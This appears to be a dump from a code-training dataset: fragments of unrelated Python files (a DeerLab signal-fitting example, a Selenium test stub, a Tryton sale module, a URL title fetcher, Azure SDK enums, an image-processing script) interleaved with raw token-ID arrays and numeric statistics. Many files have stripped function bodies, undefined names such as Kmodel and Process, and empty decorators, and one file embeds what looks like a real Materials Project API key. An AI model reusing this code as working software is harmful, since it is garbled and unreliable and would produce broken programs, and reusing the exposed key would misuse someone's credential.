11770,
7336,
62,
4805,
1961,
18379,
1581,
796,
33432,
3419,
198
] | 3 | 40 |
# %% [markdown]
"""
Fitting a custom kernel model with a parameter-free distribution
=================================================================
How the use of SNLLS to fit a kernel model and a parameter-free
distribution to a dipolar signal.
"""
import numpy as np
import matplotlib.pyplot as plt
import deerlab as dl
# %% [markdown]
# Generating a dataset
#-----------------------------------------------------------------------------
# For this example we will simulate a simple 4pDEER signal
t = np.linspace(-0.5,5,300) # µs
r = np.linspace(2,6,200) # nm
# Generate ground truth and input signal
P = dl.dd_gauss2(r,[3.5, 0.25, 0.4, 4.5, 0.4, 0.6])
lam = 0.36
c0 = 250 # µM
B = dl.bg_hom3d(t,c0,lam)
K = dl.dipolarkernel(t,r,mod=lam,bg=B)
V = K@P + dl.whitegaussnoise(t,0.01)
# %% [markdown]
# Fitting via SNLLS
#------------------
# Now in order to fit a non-linear dipolar kernel model ``Kmodel`` and a
# linear parameter-free distance distribution ``Pfit`` simultaneously, we
# can use the separable non-linear least squares ``SNLLS`` method.
#
# First we define the function that contains the model for the dipolar kernel we want to fit. It
# is a non-linear functon that accepts the parameter array ``p`` and returns the
# fitted dipolar kernel ``K``. The linear parameters, in this case ``P``, are
# computed by solving a Tikhonov-regularized linear LSQ problem automatically in the ``snlls`` function.
# %% [markdown]
# Next, there are two different parameter sets being fitted at the same time:
# linear and non-linear parameters. Therefore, the lower/upper bounds for
# the two sets need (or can) be specified.
#--------------------------
# Non-linear parameters:
#--------------------------
# lam c0
#--------------------------
par0 = [0.5, 50 ] # Start values
lb = [ 0, 0.05] # lower bounds
ub = [ 1, 1000] # upper bounds
#--------------------------
# Linear parameters:
#--------------------------
# Pfit
#--------------------------
lbl = np.zeros_like(r) # Non-negativity constraint of P
ubl = [] # Unconstrained upper boundary
# Run SNLLS optimization
fit = dl.snlls(V,Kmodel,par0,lb,ub,lbl,ubl)
parfit = fit.nonlin
Pfit = fit.lin
# Get non-linear parameters uncertainty
param95 = fit.nonlinUncert.ci(95) # 95#-confidence interval
# Get linear parameters (distribution) uncertainty
Pci50 = fit.linUncert.ci(50) # 50#-confidence interval
Pci95 = fit.linUncert.ci(95) # 95#-confidence interval
# Print result
print(f'lambda = {parfit[0]:.2f}({param95[0,0]:.2f}-{param95[0,1]:.2f})')
print(f'c0 = {parfit[1]:.2f}({param95[1,0]:.2f}-{param95[1,1]:.2f})µM')
# Get fitted model
Kfit = Kmodel(parfit)
Vfit = Kfit@Pfit
# %% [markdown]
# Plots
#------
plt.subplot(211)
plt.plot(t,V,'k.',t,Vfit,'b')
plt.grid(alpha=0.3)
plt.xlabel('t (µs)')
plt.ylabel('V')
plt.legend(['data','fit'])
plt.subplot(212)
plt.plot(r,P,'k',r,Pfit,'b')
plt.fill_between(r,Pci50[:,0],Pci50[:,1],color='b',alpha=0.4,linestyle='None')
plt.fill_between(r,Pci95[:,0],Pci95[:,1],color='b',alpha=0.2,linestyle='None')
plt.grid(alpha=0.3)
plt.xlabel('r (nm)')
plt.ylabel('P (nm⁻¹)')
plt.legend(['truth','fit','50%-CI','95%-CI'])
# %%
| [
2,
43313,
685,
4102,
2902,
60,
198,
37811,
198,
37,
2535,
257,
2183,
9720,
2746,
351,
257,
11507,
12,
5787,
6082,
198,
23926,
28,
198,
198,
2437,
262,
779,
286,
11346,
3069,
50,
284,
4197,
257,
9720,
2746,
290,
257,
11507,
12,
5787,... | 2.706838 | 1,170 |
import time
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import random
import csv
from functions import sign_in, wait_for_element, URL
from selenium.webdriver.chrome.options import Options
from webdriver_manager.chrome import ChromeDriverManager
# Adatkezelési nyilatkozat használata
# Regisztráció
#Bejelentkezés
#Kijelentkezés
#Adatok listázása
#Új adatbevitel
#Több oldalas lista bejárása
# Ismételt és sorozatos adatbevitel adatforrásból
# Adatok lementése felületről - Global feed bejegyzések címei
#Meglévő adat módosítása
#Adat törlése
| [
11748,
640,
628,
198,
6738,
384,
11925,
1505,
1330,
3992,
26230,
198,
6738,
384,
11925,
1505,
13,
12384,
26230,
13,
11321,
13,
1525,
1330,
2750,
198,
6738,
384,
11925,
1505,
13,
12384,
26230,
13,
11284,
13,
17077,
1330,
5313,
32103,
213... | 2.435331 | 317 |
#! -*- coding: utf8 -*-
# This file is part of the sale_pos module for Tryton.
# The COPYRIGHT file at the top level of this repository contains the full
# copyright notices and license terms.
from decimal import Decimal
from trytond.model import ModelView, fields, ModelSQL
from trytond.pool import PoolMeta, Pool
from trytond.pyson import Bool, Eval, Not
from trytond.transaction import Transaction
from trytond.wizard import Wizard, StateView, StateTransition, Button, StateAction
from trytond import backend
from trytond.tools import grouped_slice
__all__ = ['Sale', 'SaleWarehouse', 'ProductLine', 'WarehouseStock',
'WizardWarehouseStock']
__metaclass__ = PoolMeta
_ZERO = Decimal('0.0')
class Sale():
'Sale'
__name__ = 'sale.sale'
@classmethod
@classmethod
@ModelView.button_action('sale_stock_product_mini.warehouse_stock')
class SaleWarehouse(ModelView, ModelSQL):
'Producto por Bodega'
__name__ = 'sale.warehouse'
sale = fields.Many2One('sale.sale', 'Sale', readonly = True)
product = fields.Char('Product', readonly = True)
warehouse = fields.Char('Warehouse', readonly = True)
quantity = fields.Char('Quantity', readonly = True)
class ProductLine(ModelView, ModelSQL):
'Product Line'
__name__ = 'product.product.line'
sequence = fields.Integer('Sequence')
product = fields.Many2One('product.product', 'Product')
add = fields.Boolean('Add')
quantity = fields.Numeric('Quantity')
review = fields.Boolean('Verificar Stock')
list_price = fields.Numeric('Precio Venta')
total_stock = fields.Integer('Total Stock')
class WarehouseStock(ModelView):
'Warehouse Stock'
__name__ = 'sale_stock_product_mini.warehouse'
product = fields.Char('Product')
lines = fields.One2Many('product.product.line', None, 'Lines')
warehouse_sale =fields.One2Many('sale.warehouse', 'sale', 'Product by Warehouse', readonly=True)
@fields.depends('product', 'lines')
@fields.depends('lines', 'warehouse_sale', 'product')
class WizardWarehouseStock(Wizard):
'Wizard Warehouse Stock'
__name__ = 'sale_stock_product_mini.warehouse_stock'
start = StateView('sale_stock_product_mini.warehouse',
'sale_stock_product_mini.warehouse_stock_view_form', [
Button('Close', 'end', 'tryton-cancel'),
Button('Add', 'add_', 'tryton-ok'),
])
add_ = StateTransition()
| [
198,
2,
0,
532,
9,
12,
19617,
25,
3384,
69,
23,
532,
9,
12,
198,
2,
770,
2393,
318,
636,
286,
262,
5466,
62,
1930,
8265,
329,
9993,
1122,
13,
198,
2,
383,
27975,
38162,
9947,
2393,
379,
262,
1353,
1241,
286,
428,
16099,
4909,
... | 2.871429 | 840 |
# -*- coding: utf-8 -*-
"""
Created on Sat Oct 13 14:39:56 2018
@author: sudar
"""
from bs4 import Tag, BeautifulSoup
import requests
import csv
import numpy as np
import pandas as pd
from url_feeder import *
import re
import traceback
# ===========================Retrieve Data=================================
#####Uncomment to test######
# ===========================Retrieval Source=============================
if __name__== "__main__":
section = str(input("please input your section: "))
if section == 'company-officers':
company_management = url_feeder(section)
urls = company_management.feeder()
get_company_management(urls)
if section == 'financial-highlights':
financial = url_feeder(section)
urls = financial.feeder()
get_financial_highlights(urls)
if section == 'analyst':
analyst = url_feeder(section)
urls = analyst.feeder()
get_analyst(urls)
if section == 'overview':
overview = url_feeder(section)
urls = overview.feeder()
get_overview(urls)
if section == 'industry':
industry = url_feeder(section)
urls = industry.feeder()
get_industry(urls)
if section == 'segment':
segment = url_feeder(section)
urls = segment.feeder()
get_segment(urls)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
41972,
319,
7031,
2556,
1511,
1478,
25,
2670,
25,
3980,
2864,
198,
198,
31,
9800,
25,
424,
27455,
198,
37811,
198,
198,
6738,
275,
82,
19,
1330,
17467,
11,... | 2.482079 | 558 |
import json
from nandboxbots.outmessages.OutMessage import OutMessage
| [
11748,
33918,
198,
198,
6738,
299,
392,
3524,
42478,
13,
448,
37348,
1095,
13,
7975,
12837,
1330,
3806,
12837,
628
] | 3.6 | 20 |
#!/usr/bin/python
# -*- coding: UTF-8 -*-
### Modules Importing ###
import os
import requests
from bs4 import BeautifulSoup
import toml
import argparse
### Modules Importing ###
class Main:
'''
Main Operations
Loading configuration files and languages, show the version and the logo, etc.
The functions on this class will be ran as soon as the program started.
'''
def GetParser(self):
'''
This function is used to get the options the users give.
'''
parser = argparse.ArgumentParser(
description='HELP', epilog='Have a nice day!')
parser.add_argument('-v', '--version', help='Show the version.', action='store_true')
parser.add_argument('-f', '--format', help='The format of output')
parser.add_argument('-o', '--output', help='The filename of output')
parser.add_argument(
'-u', '--url', help='The url from which you want to get the Title')
parser.add_argument(
'-i', '--input-file', help='The original url list. It may be a *.txt file.')
parser.add_argument(
'-b', '--batch-mode', help=
'Get titles from multi URLs, a list file(*.txt) and an output-file are required.', action="store_true")
return parser
def LoadTheConfig(self, filename):
'''
Configuration files will be loaded by this function.
This parameter "filename" is required to be a name of a toml file (*.toml),
In the source code library, you can find it in the directory 'config/'
For the installed, usually, it will be moved to the '/usr/share/titlegetter/'
And the file is "config.toml"
When finished loading, the result including the content of the configuration file would be returned.
And the other functions would use the result.
'''
config = toml.load(filename)
return config
def ShowLogo(self, config):
'''
The intention of this function is simple.
Showing a LOGO composed of texts on a terminal is its final mission. LOL
However, the LOGO was written to the configuration file by a foolish dog,
So the parameter "config" is used to receive the result of the function "LoadTheConfig()".
'''
print(config['Sign']['LOGO'])
'''
Well, finished.
But in order to read the LOGO correctly, the parameter "config" is required.
such as:
config = LoadTheConfig("config.toml")
ShowLogo(config=config)
Like this.
'''
def LoadOutputs(self, filename):
'''
The intention of this function is the same one as the function LoadTheConfig().
This parameter "filename" is required to be a name of a toml file (*.toml),
So...
In the source code library, you can find it in the directory 'config/'.
For the installed, usually, it will be moved to the '/usr/share/titlegetter/'.
And the file is "lang.toml".
Generally, we needn't to edit this file.
'''
lang = toml.load(filename)
return lang
'''
Here is the running aera for the classes, everything will be started from here.
'''
# Step Zero, initialize everything.
Starting = Main()
Do = Process()
if os.path.exists(str(os.getenv('XDG_CONFIG_HOME')) + '/titlegetter/config.toml') == True:
config = Starting.LoadTheConfig(
os.getenv('XDG_CONFIG_HOME') + '/titlegetter/config.toml')
elif os.path.exists(os.getenv('HOME') + '/.config/titlegetter/config.toml') == True:
config = Starting.LoadTheConfig(
os.getenv('HOME') + '/.config/titlegetter/config.toml')
elif os.path.exists('/etc/titlegetter/config.toml') == True:
config = Starting.LoadTheConfig('/etc/titlegetter/config.toml')
elif os.path.exists('config/config.toml') == True:
# Now it's time to load the config file. :)
config = Starting.LoadTheConfig(filename="config/config.toml")
Starting.ShowLogo(config=config)
parser = Starting.GetParser()
args = parser.parse_args()
headers = config['headers'] # import the headers
session = requests.session() # start a session
# Step One, Check if the BatchMode opening.
# Now it's time to check the WorkMode.
# if the LOGO is printed correctly, the configuration file has been loaded successfully.
if args.version:
Starting.ShowVersion('config/version')
os._exit(0)
if not args.batch_mode:
# If it's zero, then we will work on single-url mode.
# Now we just need to get the url.
URL = args.url
# then get the title
if URL == None:
parser.error('URL is required!')
parser.print_help()
Page = Do.GetPage(headers=headers, URL=URL, session=session, config=config)
Title = Do.GetTitle(page=Page)
# Then got the format.
if args.format == 'txt':
Do.PrintAsPureText(URL=URL, title=Title)
elif args.format == 'md':
Do.PrintAsMarkDown(URL=URL, title=Title)
elif args.format == 'html':
Do.PrintAsHTML(URL=URL, title=Title)
elif args.format == 'bbscode':
Do.PrintAsBBScode(URL=URL, title=Title)
elif args.format == None:
parser.error('Format is required!\n')
parser.print_help()
else:
parser.error("'" + args.format + "'" +
' is not a legal format that TitleGetter supports.\n')
parser.print_help()
elif args.batch_mode:
# If the WorkMode is one, then it will be different.
# at first we should read a text(*.txt) file which contains some URLs and the output-file.
InputFileName = args.input_file
# Then we need to get the name of output-file
OutputFileName = args.output
# And the format
Format = args.format
# If None, print the warn.
if InputFileName == None:
parser.error('Filename is required!')
parser.print_help()
os._exit(0)
if OutputFileName == None:
parser.error('Filename is required!')
parser.print_help()
os._exit(0)
if Format == None:
parser.error('Format is required!')
parser.print_help()
os._exit(0)
# If everything is ok.
with open(OutputFileName, 'w', encoding='utf-8') as f:
URLList = open(InputFileName)
for URL in URLList:
PureURL = URL.strip()
if PureURL == '':
parser.error('URL can not be empty!')
f.close()
os.remove(OutputFileName)
os._exit(0)
print('[Loaded] ' + PureURL)
Page = Do.GetPage(headers=headers, URL=PureURL, session=session)
Title = Do.GetTitle(page=Page)
if Format == 'txt':
f.write('Title: ' + Title + '\n' + 'Link: ' + PureURL + '\n\n')
Do.PrintAsPureText(title=Title, URL=PureURL)
elif Format == 'md':
f.write('[' + Title + ']' + '(' + PureURL + ')' + '\n\n')
Do.PrintAsMarkDown(title=Title, URL=PureURL)
elif Format == 'html':
f.write("<ul><a href=" + "\"" + PureURL +
"\"" + ">" + Title + "</a></ul>" + "\n")
Do.PrintAsHTML(title=Title, URL=PureURL)
elif Format == 'bbscode':
f.write("[url=" + PureURL + "]" + Title + "[/url]")
Do.PrintAsBBScode(title=Title, URL=PureURL)
# Tell the file to the user
print('\n\n\n\n File saved as:' + os.getcwd() + '/' + OutputFileName)
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
2,
532,
9,
12,
19617,
25,
41002,
12,
23,
532,
9,
12,
198,
198,
21017,
3401,
5028,
17267,
278,
44386,
198,
11748,
28686,
198,
11748,
7007,
198,
6738,
275,
82,
19,
1330,
23762,
50,
10486,
1... | 2.433398 | 3,078 |
#! -*- coding: utf-8 -*-
#---------------------------------
# モジュールのインポート
#---------------------------------
import os
import argparse
from data_loader import common
_data_type = os.environ['DATA_TYPE']
if (_data_type == 'CIFAR-10'):
from data_loader import cifar10
elif (_data_type == 'Titanic'):
from data_loader import titanic
elif (_data_type == 'SARCOS'):
from data_loader import sarcos
elif (_data_type == 'COCO2014'):
from data_loader import coco_loader
elif (_data_type == 'MoviePoster'):
from data_loader import movie_poster
elif (_data_type == 'MNIST'):
from data_loader import mnist
else:
print('[ERROR] Unknown DATA_TYPE({})'.format(_data_type))
quit()
#---------------------------------
# 定数定義
#---------------------------------
#---------------------------------
# 関数
#---------------------------------
#---------------------------------
# メイン処理
#---------------------------------
if __name__ == '__main__':
main()
| [
2,
0,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
2,
3880,
12,
198,
2,
14524,
95,
21091,
24440,
43353,
5641,
11482,
6527,
1209,
251,
12045,
230,
198,
2,
3880,
12,
198,
11748,
28686,
198,
11748,
1822,
29572,
19... | 3.025641 | 312 |
import numpy as np
| [
11748,
299,
32152,
355,
45941,
201
] | 3.166667 | 6 |
#! /usr/bin/python
# -*- coding: utf-8 -*-
__author__ = "Osman Baskaya"
import os
inst = "hdp-wsi/wsi_input/example/num_test_instances.all.txt"
wsi_input_folder = "hdp-wsi/wsi_input/example/all/"
#key_folder = "/scratch/1/obaskaya/mapping-impact/data/twitter/keys"
key_folder = "../data/twitter/keys"
existed = set([f[:-4] + ".n" for f in os.listdir(key_folder) if f.endswith('.key')])
print "Existed number of pseudoword is %d" % len(existed)
lines = open(inst).readlines()
f = open(inst, 'w')
total = 0
for line in lines:
ll, num = line.split()
if ll in existed:
f.write(line)
total += int(num)
else:
if os.path.exists(wsi_input_folder + ll + '.lemma'):
os.remove(wsi_input_folder + ll + '.lemma')
print "Total instances %d" % total
f.close()
| [
2,
0,
1220,
14629,
14,
8800,
14,
29412,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
834,
9800,
834,
796,
366,
16748,
805,
347,
2093,
11729,
1,
198,
198,
11748,
28686,
198,
198,
8625,
796,
366,
71,
26... | 2.267606 | 355 |
# Generated by Django 2.1.7 on 2019-04-12 06:15
from django.db import migrations
| [
2,
2980,
515,
416,
37770,
362,
13,
16,
13,
22,
319,
13130,
12,
3023,
12,
1065,
9130,
25,
1314,
198,
198,
6738,
42625,
14208,
13,
9945,
1330,
15720,
602,
628
] | 2.766667 | 30 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum, EnumMeta
from six import with_metaclass
class AppAction(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Type of action of the operation.
"""
#: Web app was restarted.
RESTARTED = "Restarted"
#: Web app was stopped.
STOPPED = "Stopped"
#: There was an operation to change app setting on the web app.
CHANGED_APP_SETTINGS = "ChangedAppSettings"
#: The job has started.
STARTED = "Started"
#: The job has completed.
COMPLETED = "Completed"
#: The job has failed to complete.
FAILED = "Failed"
class AppServicePlanAction(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Type of action on the app service plan.
"""
#: App Service plan is being updated.
UPDATED = "Updated"
class AsyncStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Asynchronous operation status of the operation on the app service plan.
"""
#: Async operation has started.
STARTED = "Started"
#: Async operation has completed.
COMPLETED = "Completed"
#: Async operation failed to complete.
FAILED = "Failed"
class CommunicationCloudEnvironmentModel(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The cloud that the identifier belongs to.
"""
PUBLIC = "public"
DOD = "dod"
GCCH = "gcch"
class MediaJobErrorCategory(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Helps with categorization of errors.
"""
#: The error is service related.
SERVICE = "Service"
#: The error is download related.
DOWNLOAD = "Download"
#: The error is upload related.
UPLOAD = "Upload"
#: The error is configuration related.
CONFIGURATION = "Configuration"
#: The error is related to data in the input files.
CONTENT = "Content"
class MediaJobErrorCode(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Error code describing the error.
"""
#: Fatal service error, please contact support.
SERVICE_ERROR = "ServiceError"
#: Transient error, please retry, if retry is unsuccessful, please contact support.
SERVICE_TRANSIENT_ERROR = "ServiceTransientError"
#: While trying to download the input files, the files were not accessible, please check the
#: availability of the source.
DOWNLOAD_NOT_ACCESSIBLE = "DownloadNotAccessible"
#: While trying to download the input files, there was an issue during transfer (storage service,
#: network errors), see details and check your source.
DOWNLOAD_TRANSIENT_ERROR = "DownloadTransientError"
#: While trying to upload the output files, the destination was not reachable, please check the
#: availability of the destination.
UPLOAD_NOT_ACCESSIBLE = "UploadNotAccessible"
#: While trying to upload the output files, there was an issue during transfer (storage service,
#: network errors), see details and check your destination.
UPLOAD_TRANSIENT_ERROR = "UploadTransientError"
#: There was a problem with the combination of input files and the configuration settings applied,
#: fix the configuration settings and retry with the same input, or change input to match the
#: configuration.
CONFIGURATION_UNSUPPORTED = "ConfigurationUnsupported"
#: There was a problem with the input content (for example: zero byte files, or corrupt/non-
#: decodable files), check the input files.
CONTENT_MALFORMED = "ContentMalformed"
#: There was a problem with the format of the input (not valid media file, or an unsupported
#: file/codec), check the validity of the input files.
CONTENT_UNSUPPORTED = "ContentUnsupported"
class MediaJobRetry(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Indicates that it may be possible to retry the Job. If retry is unsuccessful, please contact
Azure support via Azure Portal.
"""
#: Issue needs to be investigated and then the job resubmitted with corrections or retried once
#: the underlying issue has been corrected.
DO_NOT_RETRY = "DoNotRetry"
#: Issue may be resolved after waiting for a period of time and resubmitting the same Job.
MAY_RETRY = "MayRetry"
class MediaJobState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The previous state of the Job.
"""
#: The job was canceled. This is a final state for the job.
CANCELED = "Canceled"
#: The job is in the process of being canceled. This is a transient state for the job.
CANCELING = "Canceling"
#: The job has encountered an error. This is a final state for the job.
ERROR = "Error"
#: The job is finished. This is a final state for the job.
FINISHED = "Finished"
#: The job is processing. This is a transient state for the job.
PROCESSING = "Processing"
#: The job is in a queued state, waiting for resources to become available. This is a transient
#: state.
QUEUED = "Queued"
#: The job is being scheduled to run on an available resource. This is a transient state, between
#: queued and processing states.
SCHEDULED = "Scheduled"
class StampKind(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Kind of environment where app service plan is.
"""
#: App Service Plan is running on a public stamp.
PUBLIC = "Public"
#: App Service Plan is running on an App Service Environment V1.
ASE_V1 = "AseV1"
#: App Service Plan is running on an App Service Environment V2.
ASE_V2 = "AseV2"
| [
2,
19617,
28,
40477,
12,
23,
198,
2,
16529,
35937,
198,
2,
15069,
357,
66,
8,
5413,
10501,
13,
1439,
2489,
10395,
13,
198,
2,
49962,
739,
262,
17168,
13789,
13,
4091,
13789,
13,
14116,
287,
262,
1628,
6808,
329,
5964,
1321,
13,
19... | 3.204191 | 1,861 |
import numpy as np
import tensorflow as tf
from DeepAgent.interfaces.ibaseNetwork import BaseNetwork
| [
11748,
299,
32152,
355,
45941,
198,
11748,
11192,
273,
11125,
355,
48700,
198,
198,
6738,
10766,
36772,
13,
3849,
32186,
13,
571,
589,
26245,
1330,
7308,
26245,
628
] | 3.678571 | 28 |
# Generated by Django 3.0.8 on 2020-07-28 16:09
from django.db import migrations, models
import django.db.models.deletion
import wagtail.core.fields
| [
2,
2980,
515,
416,
37770,
513,
13,
15,
13,
23,
319,
12131,
12,
2998,
12,
2078,
1467,
25,
2931,
198,
198,
6738,
42625,
14208,
13,
9945,
1330,
15720,
602,
11,
4981,
198,
11748,
42625,
14208,
13,
9945,
13,
27530,
13,
2934,
1616,
295,
... | 2.849057 | 53 |
from azure.ai.formrecognizer import FormRecognizerClient
from azure.core.credentials import AzureKeyCredential
import pandas as pd
from .ds import AzureOCR, OCRText
from .common import LineNumber
if __name__ == '__main__':
document_filepath = ''
endpoint =''
subscription_key = ''
form_api_ocr = AzureFormApiOCR(document_filepath=document_filepath, endpoint=endpoint, subscription_key=subscription_key)
line_dataframe= form_api_ocr.line_dataframe
word_dataframe = form_api_ocr.word_dataframe
ocr_outputs = form_api_ocr.ocr_outputs
is_scanned = form_api_ocr.is_scanned
form_api_ocr = AzureFormApiOCR(document_filepath=document_filepath,
endpoint=endpoint,
subscription_key=subscription_key,
ocr_outputs=ocr_outputs)
| [
6738,
35560,
495,
13,
1872,
13,
687,
26243,
7509,
1330,
5178,
6690,
2360,
7509,
11792,
198,
6738,
35560,
495,
13,
7295,
13,
66,
445,
14817,
1330,
22134,
9218,
34,
445,
1843,
198,
11748,
19798,
292,
355,
279,
67,
198,
198,
6738,
764,
... | 2.285714 | 378 |
from django.db import models as mo
from django.utils.translation import ugettext_lazy as _
from kalinka.core.models import *
#class Transcode(mo.Model):
# uuid = mo.CharField(_('UUID'), max_length=120, primary_key=True)
# application = mo.ForeignKey(Application, verbose_name=_('Application'), db_column='application')
# task = mo.ForeignKey(TranscodeTask, verbose_name=_('Task'), db_column='task')
#
# def __unicode__(self):
# return "%s with %s" % (self.application, self.task)
#
# class Meta:
# db_table = u'klk_app_transcode'
| [
6738,
42625,
14208,
13,
9945,
1330,
4981,
355,
6941,
201,
198,
6738,
42625,
14208,
13,
26791,
13,
41519,
1330,
334,
1136,
5239,
62,
75,
12582,
355,
4808,
201,
198,
201,
198,
6738,
479,
282,
48955,
13,
7295,
13,
27530,
1330,
1635,
201,... | 2.474576 | 236 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 3 19:10:25 2019
@author: NickT
"""
import pickle
from pymatgen import MPRester
mat_api_key = 'JWV6Fi4f6VfxROtHO2uP'
mpr = MPRester(mat_api_key)
print("Loading Compounds....")
Querey = mpr.query(criteria = {'elements': ['Si'], 'nelements': 1}, properties=["task_id", "pretty_formula", 'e_above_hull',
'elements', 'volume', 'formation_energy_per_atom', 'band_gap',
'nsites', 'unit_cell_formula'])
file = open('MPDatabase.pickle', 'wb')
pickle.dump(all_compounds, file)
file.close()
stable_phase = []
for compound in all_compounds: #find all compounds with e_above_hull within 0.05 of 0
if abs(compound['e_above_hull']) < criteria/1000:
stable_phase.append(compound)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
41972,
319,
3300,
2758,
220,
513,
678,
25,
940,
25,
1495,
13130,
198,
198,
31,
9800,
25,
8047,
51,
... | 2.265363 | 358 |
import chess
import ai
cnt = 0
res_F = 'Wrong command\n'
res_0 = 'Plz continue\n'
res_1 = 'Normal end\nTry to check mate as early as possible!\n'
res_2 = 'You lose!\nShe cheated!\nHint: Check her step!\n'
flag = '*CTF{1F_i_had_A_t!me_mAch1ne}\n'
boards = []
| [
11748,
19780,
198,
11748,
257,
72,
198,
198,
66,
429,
796,
657,
198,
411,
62,
37,
796,
705,
39213,
506,
3141,
59,
77,
6,
198,
411,
62,
15,
796,
705,
3646,
89,
2555,
59,
77,
6,
198,
411,
62,
16,
796,
705,
26447,
886,
59,
77,
... | 2.20339 | 118 |
start_time = time.time()
## Local Contrast Normalization
def lcn_2d(im, sigmas=[1.591, 1.591]):
""" Apply local contrast normalization to a square image.
Uses a scheme described in Pinto et al (2008)
Based on matlab code by Koray Kavukcuoglu
http://cs.nyu.edu/~koray/publis/code/randomc101.tar.gz
data is 2-d
sigmas is a 2-d vector of standard devs (to define local smoothing kernel)
Example
=======
im_p = lcn_2d(im,[1.591, 1.591])
"""
#assert(issubclass(im.dtype.type, np.floating))
im = np.cast[np.float](im)
# 1. subtract the mean and divide by std dev
mn = np.mean(im)
sd = np.std(im, ddof=1)
im -= mn
im /= sd
lmn = gaussian_filter(im, sigmas, mode='reflect')
lmnsq = gaussian_filter(im ** 2, sigmas, mode='reflect')
lvar = lmnsq - lmn ** 2;
np.clip(lvar, 0, np.inf, lvar) # items < 0 set to 0
lstd = np.sqrt(lvar)
np.clip(lstd, 1, np.inf, lstd)
im -= lmn
im /= lstd
return im
# Training Set
cd '/export/mlrg/salavi/shamir/Annotation data set/Original Images/Good Images/Positive Counts/Training Set'
### Test Set
##cd '/mnt/ssd/shamir/Original Images/Good Images/Positive Counts/Test Set'
img_list = glob.glob('*.jpg') # creates a list of all the files with the given format
img_list = np.sort(np.array(img_list))
first_qrtr, second_qrtr = 112, 145
feature_database = []
for z in range(shape(img_list)[0]): # shape(img_list)[0], alternatively, len(...)
## cd '/export/mlrg/salavi/shamir/Annotation data set/Original Images/Good Images/Positive Counts/Training Set'
## print z, img_list[z]
### Get coordinates and extract BBgt
# decode JSON
json_data = open(img_list[z][:-4]) # img_list[z][:-4]
data = json.load(json_data)
brx, tlx, bry, tly = [], [], [], []
for x in range(shape(data["Image_data"]["boundingboxes"][:])[0]):
brx.append(data["Image_data"]["boundingboxes"][x]["corner_bottom_right_x"])
tlx.append(data["Image_data"]["boundingboxes"][x]["corner_top_left_x"])
bry.append(data["Image_data"]["boundingboxes"][x]["corner_bottom_right_y"])
tly.append(data["Image_data"]["boundingboxes"][x]["corner_top_left_y"])
brx = np.array(brx)
bry = np.array(bry)
tly = np.array(tly)
tlx = np.array(tlx)
x,y,x1,y1 = tlx, tly, brx, bry # m,n,m+w,n+h
# The Annotation Tool enables the user to draw bouning boxes beyond the image boundary which gives unexpected coordinates. To rectify this bug, the
# following function reduces the corresponding incorrect BB coordinates to a specific value (x = 639, y = 479) within the image boundaries.
rectify(x, 640)
rectify(x1, 640)
rectify(y, 480)
rectify(y1, 480)
## Extract BBgt
## cd '/export/mlrg/salavi/shamir/Annotation data set/Original Images/Good Images/Positive Counts/Training Set'
insects_red, insects_green, insects_blue = [], [], []
## im_org = Image.open(img_list[z]) # original image
im_org = cv2.imread(img_list[z], cv2.CV_LOAD_IMAGE_COLOR)
im_red_eq = lcn_2d(im_org[:,:,0],[10, 10])
im_green_eq = lcn_2d(im_org[:,:,1],[10, 10]) # 1.591
im_blue_eq = lcn_2d(im_org[:,:,2],[10, 10])
im_red = med_filter(im_red_eq)
im_green = med_filter(im_green_eq)
im_blue = med_filter(im_blue_eq)
cv2.normalize(im_red, im_red, 0,255,cv2.NORM_MINMAX)
cv2.normalize(im_green, im_green, 0,255,cv2.NORM_MINMAX)
cv2.normalize(im_blue, im_blue, 0,255,cv2.NORM_MINMAX)
## ## Linear normalization
## def normalize(image, newMax, newMin):
## img_min = np.min(image)
## img_max = np.max(image)
## for y in range(shape(image)[0]):
## for x in range(shape(image)[1]):
## image[y,x] = (((image[y,x] - img_min)*(newMax - newMin))/(img_max - img_min)) + newMin
## return image
##
## im_red = normalize(im_red, 255, 0)
## im_green = normalize(im_green, 255, 0)
## im_blue = normalize(im_blue, 255, 0)
save_insct(x, im_red, insects_red)
save_insct(x, im_green, insects_green)
save_insct(x, im_blue, insects_blue)
## for i in range(2,3): # len(x)
#### cropped = im_org.crop((int(x[i]),int(y[i]),int(x1[i]),int(y1[i]))) # PIL
## cropped = im_org[y[i]:y1[i], x[i]:x1[i]] # OpenCV
#### cropped = np.asarray(cropped) # weirdly auto-flipped
## insects.append(cropped)
## insects = np.array(insects)
for ins in range(len(insects_red)): # len(insects_red)
## print ins
im_red = insects_red[ins].copy() # PROBLEM: ALL THE IMAGES DO NOT CONFORM TO THIS CODE (POSSIBLE BUG - TRY ALL LCN IMAGES TO FIND OUT)
im_green = insects_green[ins].copy()
im_blue = insects_blue[ins].copy()
## Calculate the centre of each BB
x_im = shape(im_red)[1]
y_im = shape(im_red)[0]
x_centre = x_im/2.0
y_centre = y_im/2.0
## Calculate n by n neighbouring pixels from the centre (include centre) and store all the pixels in their respectice arrays
nbr_list_red, nbr_list_green, nbr_list_blue = [], [], []
